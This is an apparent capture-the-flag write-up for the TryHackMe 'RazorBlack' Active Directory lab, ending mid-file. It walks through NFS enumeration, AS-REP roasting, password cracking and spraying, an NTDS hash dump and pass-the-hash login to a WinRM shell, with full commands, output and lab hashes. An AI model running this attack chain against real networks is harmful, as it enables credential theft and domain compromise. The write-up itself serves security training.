Initial Recon & Enumeration
First let’s make a variable, TARGET, to stand in for the target IP address, which may change between sessions
rob:RazorBlack/ $ export TARGET=10.10.10.10
rob:RazorBlack/ $ echo $TARGET
10.10.10.10
The machine has some instructions:
“The box has ICMP enabled. So, look at ping first before starting recon and stop slapping -Pn on nmap”
Ok, let’s look at ping then, as instructed
rob:RazorBlack/ $ ping -c 2 $TARGET
PING 10.10.10.10 (10.10.10.10) 56(84) bytes of data.
64 bytes from 10.10.10.10: icmp_seq=1 ttl=127 time=20.0 ms
64 bytes from 10.10.10.10: icmp_seq=2 ttl=127 time=18.5 ms
--- 10.10.10.10 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1757ms
rtt min/avg/max/mdev = 18.450/19.233/20.016/0.783 ms
Seems pretty normal, maybe this is important later on
Let’s begin now with a scan, first masscan to capture both UDP and TCP ports
rob:RazorBlack/ $ sudo masscan -p1-65535,U:1-65535 $TARGET --rate=1000 -e tun0
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-07-21 15:59:20 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 63893/udp on 10.10.10.10
Discovered open port 389/tcp on 10.10.10.10
Discovered open port 49665/tcp on 10.10.10.10
Discovered open port 49664/tcp on 10.10.10.10
Discovered open port 49669/tcp on 10.10.10.10
Discovered open port 593/tcp on 10.10.10.10
Discovered open port 49694/tcp on 10.10.10.10
Discovered open port 139/tcp on 10.10.10.10
Discovered open port 636/tcp on 10.10.10.10
Discovered open port 3268/tcp on 10.10.10.10
Discovered open port 2049/tcp on 10.10.10.10
Discovered open port 49676/tcp on 10.10.10.10
Discovered open port 445/tcp on 10.10.10.10
Discovered open port 63924/udp on 10.10.10.10
Discovered open port 49672/tcp on 10.10.10.10
Discovered open port 5985/tcp on 10.10.10.10
Discovered open port 53/tcp on 10.10.10.10
Discovered open port 49666/tcp on 10.10.10.10
Discovered open port 49708/tcp on 10.10.10.10
Discovered open port 3389/tcp on 10.10.10.10
Discovered open port 135/tcp on 10.10.10.10
Discovered open port 63216/udp on 10.10.10.10
Discovered open port 49855/tcp on 10.10.10.10
Discovered open port 49675/tcp on 10.10.10.10
Discovered open port 111/tcp on 10.10.10.10
Discovered open port 9389/tcp on 10.10.10.10
Discovered open port 3269/tcp on 10.10.10.10
Discovered open port 47001/tcp on 10.10.10.10
Discovered open port 49679/tcp on 10.10.10.10
Discovered open port 62512/udp on 10.10.10.10
Discovered open port 464/tcp on 10.10.10.10
Discovered open port 88/tcp on 10.10.10.10
Ok, a lot of ports open there. A quick look through them tells us this is (most likely) a Windows machine (RDP, WinRM, etc.). Let’s send these ports to nmap and get some more details
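Instead of retyping the port list from the masscan output by hand, it can be parsed straight into nmap’s -p syntax. The script below is an added example, not from the original writeup; its sample input is a constructed subset of the output above, and it drops the 49xxx dynamic-range RPC ports, which the hand-picked list also leaves out.

```python
import re
from typing import Dict, Set

# Constructed subset of the masscan output above (one host, mixed TCP/UDP, and one
# port from the Windows dynamic RPC range) used as sample input.
SAMPLE_MASSCAN = """\
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-07-21 15:59:20 GMT
Initiating SYN Stealth Scan
Discovered open port 63893/udp on 10.10.10.10
Discovered open port 389/tcp on 10.10.10.10
Discovered open port 49665/tcp on 10.10.10.10
Discovered open port 445/tcp on 10.10.10.10
Discovered open port 88/tcp on 10.10.10.10
Discovered open port 62512/udp on 10.10.10.10
"""

# One "Discovered open port <port>/<proto> on <host>" line per finding.
_PORT_RE = re.compile(r"Discovered open port (\d+)/(tcp|udp) on (\S+)")

# Start of the Windows dynamic (ephemeral) port range; the 49xxx RPC endpoint
# ports found there rarely need an individual service scan.
DYNAMIC_PORT_FLOOR = 49152


def parse_masscan(output: str) -> Dict[str, Dict[str, Set[int]]]:
    """Return {host: {"tcp": {...}, "udp": {...}}}; banner and progress lines are skipped."""
    hosts: Dict[str, Dict[str, Set[int]]] = {}
    for line in output.splitlines():
        m = _PORT_RE.search(line)
        if not m:
            continue
        port, proto, host = int(m.group(1)), m.group(2), m.group(3)
        hosts.setdefault(host, {"tcp": set(), "udp": set()})[proto].add(port)
    return hosts


def nmap_port_spec(tcp: Set[int], udp: Set[int]) -> str:
    """Build nmap's -p value with explicit protocol qualifiers, e.g. T:88,445,U:53.

    The UDP part is only scanned when the nmap run also includes -sU (root required).
    """
    parts = []
    if tcp:
        parts.append("T:" + ",".join(str(p) for p in sorted(tcp)))
    if udp:
        parts.append("U:" + ",".join(str(p) for p in sorted(udp)))
    return ",".join(parts)


def build_nmap_args(output: str, skip_dynamic: bool = True) -> Dict[str, str]:
    """Map each host in the masscan output to the -p value for a follow-up service scan."""
    specs: Dict[str, str] = {}
    for host, ports in parse_masscan(output).items():
        tcp = ports["tcp"]
        if skip_dynamic:
            tcp = {p for p in tcp if p < DYNAMIC_PORT_FLOOR}
        specs[host] = nmap_port_spec(tcp, ports["udp"])
    return specs


if __name__ == "__main__":
    for host, spec in build_nmap_args(SAMPLE_MASSCAN).items():
        print(f"sudo nmap -sS -sU -sV -p {spec} {host}")
```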
rob:RazorBlack/ $ nmap -A -v -p53,88,111,135,139,389,445,464,593,636,2049,3268,3269,5985,9389 $TARGET
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-21 17:43 BST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:43
Completed NSE at 17:43, 0.00s elapsed
Initiating NSE at 17:43
Completed NSE at 17:43, 0.00s elapsed
Initiating NSE at 17:43
Completed NSE at 17:43, 0.00s elapsed
Initiating Ping Scan at 17:43
Scanning 10.10.10.10 [2 ports]
Completed Ping Scan at 17:43, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:43
Completed Parallel DNS resolution of 1 host. at 17:43, 0.03s elapsed
Initiating Connect Scan at 17:43
Scanning 10.10.10.10 [15 ports]
Discovered open port 135/tcp on 10.10.10.10
Discovered open port 139/tcp on 10.10.10.10
Discovered open port 445/tcp on 10.10.10.10
Discovered open port 111/tcp on 10.10.10.10
Discovered open port 53/tcp on 10.10.10.10
Discovered open port 88/tcp on 10.10.10.10
Discovered open port 2049/tcp on 10.10.10.10
Discovered open port 464/tcp on 10.10.10.10
Discovered open port 5985/tcp on 10.10.10.10
Discovered open port 9389/tcp on 10.10.10.10
Discovered open port 389/tcp on 10.10.10.10
Discovered open port 636/tcp on 10.10.10.10
Discovered open port 593/tcp on 10.10.10.10
Completed Connect Scan at 17:43, 0.02s elapsed (15 total ports)
Initiating Service scan at 17:43
Scanning 13 services on 10.10.10.10
Completed Service scan at 17:44, 32.28s elapsed (13 services on 1 host)
NSE: Script scanning 10.10.10.10.
Initiating NSE at 17:44
Completed NSE at 17:46, 125.63s elapsed
Initiating NSE at 17:46
Completed NSE at 17:46, 7.22s elapsed
Initiating NSE at 17:46
Completed NSE at 17:46, 0.00s elapsed
Nmap scan report for 10.10.10.10
Host is up (0.011s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-21 16:44:01Z)
111/tcp open rpcbind?
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: REDACTED, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open mountd 1-3 (RPC #100005)
3268/tcp closed globalcatLDAP
3269/tcp closed globalcatLDAPssl
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: HAVEN-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.00:
|_ Message signing enabled and required
|_smb2-time: Protocol negotiation failed (SMB2)
NSE: Script Post-scanning.
Initiating NSE at 17:46
Completed NSE at 17:46, 0.00s elapsed
Initiating NSE at 17:46
Completed NSE at 17:46, 0.00s elapsed
Initiating NSE at 17:46
Completed NSE at 17:46, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.58 seconds
Excellent, nmap has given us the first flag, the domain name, #1: REDACTED
Let’s first try to enumerate some of the low-hanging fruit, starting with SMB
rob:RazorBlack/ $ smbclient -L $TARGET -U "" -N
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
Ok, there are no shares accessible there. We can see that NFS is also available, let’s try that
rob:RazorBlack/ $ showmount -e $TARGET
Export list for 10.10.10.10:
/users (everyone)
Excellent, we can see a share, and it’s open for everyone. Let’s try mounting that and see what we can find
rob:RazorBlack/ $ sudo mount -t nfs -o vers=2 $TARGET:/users $PWD/temp -o nolock
rob:RazorBlack/ $ ls -la
total 9
drwxr-xr-x 3 rob rob 4096 Jul 21 18:03 .
drwxr-xr-x 58 rob rob 4096 Jul 21 16:21 ..
drwx------ 2 4294967294 4294967294 64 Feb 27 17:24 temp
Ok, we’ve got a folder here that can only be accessed by the user with UID 4294967294! We can either create such a user locally or we can just become root, let’s do the latter!
rob:RazorBlack/ $ sudo -i
┌──(root💀kali)-[~]
└─# cd /home/allfun/Documents/TryHackMe/RazorBlack/temp
┌──(root💀kali)-[/home/rob/Documents/TryHackMe/RazorBlack/temp]
└─# ls -la
total 7
drwx------ 2 4294967294 4294967294 64 Feb 27 17:24 .
drwxr-xr-x 3 rob rob 4096 Jul 21 18:03 ..
-rwx------ 1 4294967294 4294967294 9861 Feb 25 16:24 employee_status.xlsx
-rwx------ 1 4294967294 4294967294 80 Feb 25 19:31 sbradley.txt
┌──(root💀kali)-[/home/rob/Documents/TryHackMe/RazorBlack/temp]
└─# cp * ..
We find two files, hopefully with some useful content! First we try sbradley.txt
└─# cat sbradley.txt
`REDACTED`
And we’ve found Steven’s flag, #2: REDACTED
In the Excel file we find a table of names and roles for the HAVEN SECRET HACKER's CLUB:
| Name | Role |
| --- | --- |
| daven port | CTF PLAYER |
| imogen royce | CTF PLAYER |
| tamara vidal | CTF PLAYER |
| arthur edwards | CTF PLAYER |
| carl ingram | CTF PLAYER (INACTIVE) |
| nolan cassidy | CTF PLAYER |
| reza zaydan | CTF PLAYER |
| ljudmila vetrova | CTF PLAYER, DEVELOPER, ACTIVE DIRECTORY ADMIN |
| rico delgado | WEB SPECIALIST |
| tyson williams | REVERSE ENGINEERING |
| steven bradley | STEGO SPECIALIST |
| chamber lin | CTF PLAYER (INACTIVE) |
Given that we’ve seen the username pattern used in the organisation earlier with sbradley (first initial plus surname), we can use this table to create a potential username list if we’d like to try password spraying etc.
Let’s see if we can use cme (crackmapexec) to find a password, first using winrm
rob:RazorBlack/ $ docker run --rm byt3bl33d3r/crackmapexec winrm $TARGET -u usernames.txt -p /usr/share/wordlists/fasttrack.txt
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing WINRM protocol database
[*] Initializing LDAP protocol database
[*] Initializing MSSQL protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
WINRM 10.10.10.10 5985 HAVEN-DC [*] Windows 10.0 Build 17763 (name:HAVEN-DC) (domain:raz0rblack.thm)
WINRM 10.10.10.10 5985 HAVEN-DC [*] http://10.10.10.10:5985/wsman
WINRM 10.10.10.10 5985 HAVEN-DC [-] raz0rblack.thm\usernames.txt:/usr/share/wordlists/fasttrack.txt
We mess about with this for a while without success. Perhaps we will have more joy looking for users that don’t require Kerberos pre-authentication, whose AS-REP (which carries material encrypted with their password) we can request with impacket’s GetNPUsers.py
rob:RazorBlack/ $ impacket-GetNPUsers -usersfile usernames.txt -dc-ip 10.10.10.10 raz0rblack.thm/
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User lvetrova doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$twilliams@RAZ0RBLACK.THM:022e8f46e973d9b3d7d2dffe1bd97b7c$104ebf50bc7d0ae84c2d3c79fdd38de496ee37a81cc9d0158ec7cddc826881b15f34ec3213c3acf07b8398ebea3cc9acdc654218bcb6eb067547a4575d6bda3fd135865181f5ba739f37c4c34cfcabbf985b3a075574e153540ec16b4c3856f080c56dcdac21bcba5b4812343daffdf226480ab3541b315980d091fd6f307b57fc3d40b311a2bdc6a14cf1e0d457ff60df7ad63d0d0ff0e454f2074a19441e84a6431fd24857f6eff3fc445a477d336a2380612b2f7182ceb1ac0ce77f33d90b67053c5b55ad3c3da8e25a5b16542ff0e561d73ae2cd4cb10e73208654cc71ee881304de033c380c9d67abfd1ea442c9
[-] User sbradley doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Ok, we have found a hash for twilliams, let’s see if we can crack it
rob:RazorBlack/ $ john jwilliams.hash -w=/usr/share/wordlists/rockyou.txt --format=krb5asrep
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
roastpotatoes ($krb5asrep$twilliams@RAZ0RBLACK.THM)
1g 0:00:00:02 DONE (2021-07-22 01:13) 0.4329g/s 1828Kp/s 1828Kc/s 1828KC/s robaviejas..roadblock714
Use the "--show" option to display all of the cracked passwords reliably
Session completed
And we can, we get creds twilliams:roastpotatoes. We can try enumerating SMB now as this user
rob:RazorBlack/ $ smbclient -L //raz0rblack.thm/ -I 10.10.26.178 -U jwilliams
Enter WORKGROUP\jwilliams's password:
session setup failed: NT_STATUS_LOGON_FAILURE
Hmmm, surely that should have worked? (Note the slip in the command above: the cracked account is twilliams, not jwilliams.) Let’s see if the password is reused at all, we can go back to crackmapexec for this
# cme smb 10.10.26.178 -u usernames.txt -p roastpotatoes --continue-on-success
SMB 10.10.26.178 445 HAVEN-DC [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)
SMB 10.10.26.178 445 HAVEN-DC [-] raz0rblack.thm\dport:roastpotatoes STATUS_LOGON_FAILURE
SMB 10.10.26.178 445 HAVEN-DC [-] raz0rblack.thm\iroyce:roastpotatoes STATUS_LOGON_FAILURE
SMB 10.10.26.178 445 HAVEN-DC [-] raz0rblack.thm\tvidal:roastpotatoes STATUS_LOGON_FAILURE
SMB 10.10.26.178 445 HAVEN-DC [-] raz0rblack.thm\aedwards:roastpotatoes STATUS_LOGON_FAILURE
SMB 10.10.26.178 445 HAVEN-DC [-] raz0rblack.thm\cingram:roastpotatoes STATUS_LOGON_FAILURE
SMB 10.10.26.178 445 HAVEN-DC [-] raz0rblack.thm\ncassidy:roastpotatoes STATUS_LOGON_FAILURE
SMB 10.10.26.178 445 HAVEN-DC [-] raz0rblack.thm\rzaydan:roastpotatoes STATUS_LOGON_FAILURE
SMB 10.10.26.178 445 HAVEN-DC [-] raz0rblack.thm\lvetrova:roastpotatoes STATUS_LOGON_FAILURE
SMB 10.10.26.178 445 HAVEN-DC [-] raz0rblack.thm\rdelgado:roastpotatoes STATUS_LOGON_FAILURE
SMB 10.10.26.178 445 HAVEN-DC [+] raz0rblack.thm\twilliams:roastpotatoes
SMB 10.10.26.178 445 HAVEN-DC [-] raz0rblack.thm\sbradley:roastpotatoes STATUS_PASSWORD_MUST_CHANGE
SMB 10.10.26.178 445 HAVEN-DC [-] raz0rblack.thm\clin:roastpotatoes STATUS_LOGON_FAILURE
Steven
Interesting, here we see that the password does work for twilliams, the account we had mistyped as jwilliams above. We have also found something interesting: the same password is used by sbradley and needs to be changed (STATUS_PASSWORD_MUST_CHANGE). We can use smbpasswd to do this
rob:RazorBlack/ $ smbpasswd -r 10.10.26.178 -U sbradley
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user sbradley
Alright then, we have (what should be working) SMB creds, sbradley:password. Let’s attempt again to enumerate SMB
rob:RazorBlack/ $ smbclient -L 10.10.26.178 -U sbradley
Enter WORKGROUP\sbradley's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
trash Disk Files Pending for deletion
SMB1 disabled -- no workgroup available
Excellent, we can finally see some shares!
Let’s connect and see if there’s anything useful in the trash
rob:RazorBlack/ $ smbclient //10.10.26.178/trash -U sbradley
Enter WORKGROUP\sbradley's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Mar 16 06:01:28 2021
.. D 0 Tue Mar 16 06:01:28 2021
chat_log_20210222143423.txt A 1340 Thu Feb 25 19:29:05 2021
experiment_gone_wrong.zip A 18927164 Tue Mar 16 06:02:20 2021
sbradley.txt A 37 Sat Feb 27 19:24:21 2021
5101823 blocks of size 4096. 961087 blocks available
smb: \> mget *
Get file chat_log_20210222143423.txt? y
getting file \chat_log_20210222143423.txt of size 1340 as chat_log_20210222143423.txt (10.3 KiloBytes/sec) (average 10.3 KiloBytes/sec)
Get file experiment_gone_wrong.zip? y
getting file \experiment_gone_wrong.zip of size 18927164 as experiment_gone_wrong.zip (2459.2 KiloBytes/sec) (average 2418.5 KiloBytes/sec)
Get file sbradley.txt? y
getting file \sbradley.txt of size 37 as sbradley.txt (0.3 KiloBytes/sec) (average 2384.5 KiloBytes/sec)
smb: \> exit
Ok, 3 files found there and downloaded for examination. We check C$ and ADMIN$ too but get ‘NT_STATUS_ACCESS_DENIED’
The sbradley.txt file contains the same flag we found via NFS earlier. We seem to get a good hint from the chat_log_*.txt file
rob:RazorBlack/ $ cat chat_log_20210222143423.txt
sbradley> Hey Administrator our machine has the newly disclosed vulnerability for Windows Server 2019.
Administrator> What vulnerability??
sbradley> That new CVE-2020-1472 which is called ZeroLogon has released a new PoC.
Administrator> I have given you the last warning. If you exploit this on this Domain Controller as you did previously on our old Ubuntu server with dirtycow, I swear I will kill your WinRM-Access.
sbradley> Hey you won't believe what I am seeing.
Administrator> Now, don't say that you ran the exploit.
sbradley> Yeah, The exploit works great it needs nothing like credentials. Just give it IP and domain name and it resets the Administrator pass to an empty hash.
sbradley> I also used some tools to extract ntds. dit and SYSTEM.hive and transferred it into my box. I love running secretsdump.py on those files and dumped the hash.
Administrator> I am feeling like a new cron has been issued in my body named heart attack which will be executed within the next minute.
Administrator> But, Before I die I will kill your WinRM access..........
sbradley> I have made an encrypted zip containing the ntds.dit and the SYSTEM.hive and uploaded the zip inside the trash share.
sbradley> Hey Administrator are you there ...
sbradley> Administrator .....
The administrator died after this incident.
Press F to pay respects
Ok, so we have a ‘ZeroLogon’ vulnerability apparently. Let’s see if we can get into that last file, the .zip file, and extract the goodies that sbradley was talking about
rob:RazorBlack/ $ zip2john experiment_gone_wrong.zip > zip.hash
ver 2.0 efh 5455 efh 7875 experiment_gone_wrong.zip/system.hive PKZIP Encr: 2b chk, TS_chk, cmplen=2941739, decmplen=16281600, crc=BDCCA7E2
ver 2.0 efh 5455 efh 7875 experiment_gone_wrong.zip/ntds.dit PKZIP Encr: 2b chk, TS_chk, cmplen=15985077, decmplen=58720256, crc=68037E87
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
rob:RazorBlack/ $ john zip.hash -w=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
`REDACTED` (experiment_gone_wrong.zip)
1g 0:00:00:00 DONE (2021-07-22 02:04) 1.075g/s 9020Kp/s 9020Kc/s 9020KC/s elephantmeee..ejazzie13
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Great, we found #3: REDACTED
Using the password now to extract the zipped files we find 2 system files that we should be able to dump credentials from
rob:zipfiles/ $ unzip -P electromagnetismo ../experiment_gone_wrong.zip
Archive: ../experiment_gone_wrong.zip
inflating: system.hive
inflating: ntds.dit
rob:zipfiles/ $ ls -lA
total 73244
-rwxr-xr-x 1 rob rob 58720256 Mar 16 05:33 ntds.dit
-rwxr-xr-x 1 rob rob 16281600 Mar 16 05:38 system.hive
We can go back to the impacket tools for this and use secretsdump.py
rob:zipfiles/ $ impacket-secretsdump -ntds ntds.dit -system system.hive local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x17a0a12951d502bb3c14cf1d495a71ad
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 84bf0a79cd645db4f94b24c35cfdf7c7
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1afedc472d0fdfe07cd075d36804efd0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HAVEN-DC$:1000:aad3b435b51404eeaad3b435b51404ee:4ea59b8f64c94ec66ddcfc4e6e5899f9:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:703a365974d7c3eeb80e11dd27fb0cb3:::
RAZ0RBLACK\j.smith:4549:aad3b435b51404eeaad3b435b51404ee:da3542420eff7cfab8305a68b7da7043:::
RAZ0RBLACK\j.johnson:4550:aad3b435b51404eeaad3b435b51404ee:c378739d7c136c1281d06183665702ea:::
--snip--
RAZ0RBLACK\c.barnhart:aes128-cts-hmac-sha1-96:c92201cf2fe91f0539ecdc750cbbc287
RAZ0RBLACK\c.barnhart:des-cbc-md5:c126d0435119526b
[*] Cleaning up...
And we get about 6000 lines dumped (hence the ‘–snip–’ above!)
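Before hunting for one specific account, a dump in this format is worth auditing for hygiene problems. The script below is an added example, not part of the writeup: it parses the domain\uid:rid:lmhash:nthash::: lines (ignoring the status and Kerberos-key lines), extracts the NT-hash column, and reports blank passwords, stored LM hashes and NT hashes shared between accounts, the kind of reuse that showed up between twilliams and sbradley earlier. All sample lines are constructed.

```python
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple

# Well-known constants: LM value of an unstored/empty password and NT hash of "".
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in secretsdump's NTDS format; every 32-hex value other than the
# two constants above is made up and belongs to no real system.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
EXAMPLE\\twilliams:1104:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
EXAMPLE\\sbradley:1105:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
EXAMPLE\\legacy:1106:00112233445566778899aabbccddeeff:ffeeddccbbaa99887766554433221100:::
EXAMPLE\\twilliams:aes256-cts-hmac-sha1-96:0000000000000000000000000000000000000000000000000000000000000000
[*] Cleaning up...
"""

# [domain\]user:rid:lmhash:nthash:::  ("[*]" status lines and Kerberos key lines do not match)
_NTDS_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:\\]+):(?P<rid>\d+)"
    r":(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::"
)


class Account(NamedTuple):
    domain: str
    user: str
    rid: int
    lm: str
    nt: str


def parse_ntds_lines(text: str) -> List[Account]:
    """Parse the hash lines out of a secretsdump run and ignore everything else."""
    accounts: List[Account] = []
    for line in text.splitlines():
        m = _NTDS_RE.match(line.strip())
        if m:
            accounts.append(Account(m.group("domain") or "", m.group("user"), int(m.group("rid")),
                                    m.group("lm").lower(), m.group("nt").lower()))
    return accounts


def nt_hashes(accounts: List[Account]) -> List[str]:
    """The 4th ':'-separated field of each line, i.e. what awk -F : '{print $4}' extracts."""
    return [a.nt for a in accounts]


def audit(accounts: List[Account]) -> Dict[str, list]:
    """Flag blank passwords, stored LM hashes and NT hashes shared between accounts.

    A shared NT hash means an identical password (reuse). Disabled accounts such as
    Guest are not distinguishable here; secretsdump's -user-status option adds that.
    """
    findings: Dict[str, list] = {"blank_password": [], "lm_hash_stored": [], "shared_nt_hash": []}
    by_nt: Dict[str, List[str]] = defaultdict(list)
    for a in accounts:
        if a.nt == EMPTY_NT:
            findings["blank_password"].append(a.user)
        if a.lm != EMPTY_LM:          # LM storage enabled: trivially crackable legacy hash
            findings["lm_hash_stored"].append(a.user)
        by_nt[a.nt].append(a.user)
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings["shared_nt_hash"].append(sorted(users))
    return findings


if __name__ == "__main__":
    accounts = parse_ntds_lines(SAMPLE_DUMP)
    print(f"{len(accounts)} accounts, {len(set(nt_hashes(accounts)))} distinct NT hashes")
    for kind, hits in audit(accounts).items():
        print(f"{kind}: {hits}")
```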
Now, in the table we found earlier we saw that Ljudmila is the AD admin
| Name | Role |
| --- | --- |
| ljudmila vetrova | CTF PLAYER, DEVELOPER, ACTIVE DIRECTORY ADMIN |
Let’s see what we can find in the way of Admin hashes
rob:zipfiles/ $ grep -i admin *
secretsdump.hash.ntds:Administrator:500:aad3b435b51404eeaad3b435b51404ee:1afedc472d0fdfe07cd075d36804efd0:::
secretsdump.hash.ntds.kerberos:Administrator:aes256-cts-hmac-sha1-96:1f435bd4ebd10a6d6a777eecd6354f690036c8f695844ee71468cd77ec9edb93
secretsdump.hash.ntds.kerberos:Administrator:aes128-cts-hmac-sha1-96:1db214970c0e11eea7f98968f9ba9263
secretsdump.hash.ntds.kerberos:Administrator:des-cbc-md5:46e9b96eb35d236b
grep: system.hive: binary file matches
Hmmm, none of these seem right, perhaps she has another regular account. To use crackmapexec again to search for this we want only the NTLM hashes from secretsdump.hash.ntds. This means taking the 4th field (using ‘:’ as a delimiter)
rob:zipfiles/ $ awk -F : '{print $4}' secretsdump.hash.ntds > ntlm.hashes
rob:zipfiles/ $ head ntlm.hashes
1afedc472d0fdfe07cd075d36804efd0
31d6cfe0d16ae931b73c59d7e0c089c0
4ea59b8f64c94ec66ddcfc4e6e5899f9
703a365974d7c3eeb80e11dd27fb0cb3
da3542420eff7cfab8305a68b7da7043
c378739d7c136c1281d06183665702ea
9f73aaafc3b6d62acdbb0b426f302f9e
6a5bad944868142e65ad3049a393e587
b112332330f11267486d21549d326bd5
f9b8c9864aa7bc53405ed45b48ef19ef
Ok, that looks good, let’s see if we can find Ljudmila now
# cme smb 10.10.62.129 -u lvetrova -H ntlm.hashes
SMB 10.10.62.129 445 HAVEN-DC [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)
SMB 10.10.62.129 445 HAVEN-DC [-] raz0rblack.thm\lvetrova:1afedc472d0fdfe07cd075d36804efd0 STATUS_LOGON_FAILURE
SMB 10.10.62.129 445 HAVEN-DC [-] raz0rblack.thm\lvetrova:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE
--snip--
SMB 10.10.62.129 445 HAVEN-DC [-] raz0rblack.thm\lvetrova:c184a72ed800899bc1ff633778a89b5e STATUS_LOGON_FAILURE
SMB 10.10.62.129 445 HAVEN-DC [+] raz0rblack.thm\lvetrova REDACTED
And we got it (on the 3rd or 4th attempt with nothing changing, very weird!). This gives us Ljudmila’s hash, #4: REDACTED
Ljudmila
Now that we have what is (hopefully) someone with admin privileges, let’s see if we can log in now via evil-winrm
rob:RazorBlack/ $ /opt/evil-winrm/evil-winrm.rb -i 10.10.62.129 -u lvetrova -H f220d3988deb3f516c73f40ee16c431d
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\lvetrova\Documents>
And we have a shell!
We find one file in Ljudmila’s home folder, an xml file
*Evil-WinRM* PS C:\Users\lvetrova> type lvetrova.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">Your Flag is here =></S>
